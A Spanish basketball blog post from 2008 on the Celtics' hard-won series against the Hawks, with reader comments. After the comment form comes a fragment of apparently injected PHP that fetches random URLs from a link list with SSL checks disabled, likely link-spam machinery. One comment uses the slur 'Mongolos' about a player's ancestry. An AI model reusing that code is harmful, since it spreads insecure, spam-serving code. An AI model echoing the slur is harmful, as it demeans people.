Celtics: más peligrosos que nunca

05 de May de 2008 por TheDeerHunter

Cuando una franquicia como Boston Celtics, con todos esos números retirados y esos estandartes colgados del techo, todos esos títulos, esas leyendas, ese olor a historia consigue un gran equipo como el que tiene ahora, logra el mejor balance de la liga y sufre lo indecible para eliminar al octavo clasificado de una devaluada conferencia este… Cuando eso sucede, lo más fácil es decir que los jugadores han subestimado al rival, que se han relajado, que no se lo han tomado en serio, que no se esfuerzan, que han jugado mal, que no sienten los colores y todo ese tipo de cosas que muchas veces solemos decir. Es muy posible que, en muchas ocasiones, sea esa la verdad, pero en otras, de la misma forma que uno por muy bueno que sea puede no estar acertado siempre, otro que no lo sea tanto puede dejarse llevar por la ilusión, el coraje y las ganas de hacerlo bien y lograr subir su nivel hasta el punto de poder competir de tú a tú contra cualquiera.

Atlanta Hawks es un equipo que cuenta fundamentalmente con un bloque jovenes muy prometedores Josh Smith, Childresh, Marvin Williams, Pachulia, Horford, Salim Stoudamire, Acie Law… y también con algún jugador con experiencia y nivel “All-Star” o similar, Joe Johnson y Mike Bibby. Es un equipo con un potencial muy alto que tiene toda la pinta de dar que hablar en un futuro no muy lejano y que ha jugado muy bien durante muchas fases de esta temporada llegando a vencer a casi todos los equipos que se han clasificado para play-offs, tanto del este como del oeste. Es un equipo por juventud muy irregular pero también muy físico y no exento de calidad. Es un equipo que según en qué circunstancias pueden ganar a cualquiera. Precísamente las circunstancias que se han dado.

Y es que es cierto que han logrado sorprender a Boston. Ellos no esperaban esta eliminatoria tan extremadamente dura, como tampoco lo esperabamos ningún aficionado, ningún analista ni prácticamente nadie que siga mínimamente esta competición. Pero eso no significa que Boston han jugado relajados, o que no se lo han tomado en serio o que no se han esforzado… sólo hay que haber observado sus rostros y sus miradas para comprender que no ha sido así en absoluto. La ilusión y la casta con la que Hawks han defendido esta eliminatoria han provocado que Boston, con todas sus mejores armas en liza hayan estado a punto de quedar eliminados. Al final, con mucho esfuerzo y sufrimiento, los Celtics han logrado poner las cosas en su sitio. Lo curioso es que Boston ha prevalecido gracias a su carácter, a su fuerza de voluntad, cuando lo más fácil es que la presión del favorito, de la historia, de los objetivos que persigues pueda hacer que te tiemble el pulso y caigas derrotado contra alguien que no tiene nada que perder. Curioso es, como decimos, porque alguno de sus mejores jugadores han sido marcados en algún momento de sus carreras por la sombra de la duda, un error lamentable. se ha demostrado que posse el carácter del campeón aunque todavía no lo hayan sido.

Estos Celtics son peligrosísimos. Mucho más después de esta eliminatoria.

Comenta

6 comentarios a esta entrada

  1. Gallis dice:
    #1

    Correcto. Ahora son un animal herido y son mucho más peligroso. Desde luego esto no creo que les vuelva a pasar y si Cleveland les quiere eliminar van a tener que subir aún más su nivel y Lebron va a tener que hacer unas cuantas de las suyas.

    Pero bueno, también puede ser una pequeña mina en su confianza. De momento ya se han dado cuenta de que no son tan buenos como se creían y verse otra vez en esta situación puede hacerles dudar. Más cuando vean que delante no hay una cuadrilla de pipiolos con muchas ganas y más futuro, sino un aspirante al anillo…

    A ver que pasa.

      Citar

  2. TheDeerHunter dice:
    #2

    No sé si herido… pero sí en estado de alerta.

    Mañana la previa del Boston-Cleveland… pero ya anticipo que mi pronóstico no va a ser un 4-3, creo que va a ser más fácil para Boston esta vez.

    En cambio, si hubieran hecho un 4-0 en primera ronda todavía daría algunas opciones a Cleveland de sorprenderlos. Ahora mismo no lo veo.

      Citar

  3. Viva_Dirk dice:
    #3

    Estoy deacuerdo con Deer, salvo el tercer partido donde si pudo haber algo de relajación, los otros 2 partidos en Atlanta fueron ganados por los Hawks y no los perdieron los Celtics.

    Y la defensa que practicaron los verdes en el 7º partido no tiene calificativo.

      Citar

  4. Gallis dice:
    #4

    Yo casi me guardo mi pronóstico para cuando hagas la previa mañana, jeje…

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Acie Law tiene antepasados orientales??

      Citar

  6. TheDeerHunter dice:
    #6

    Mongolos, creo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>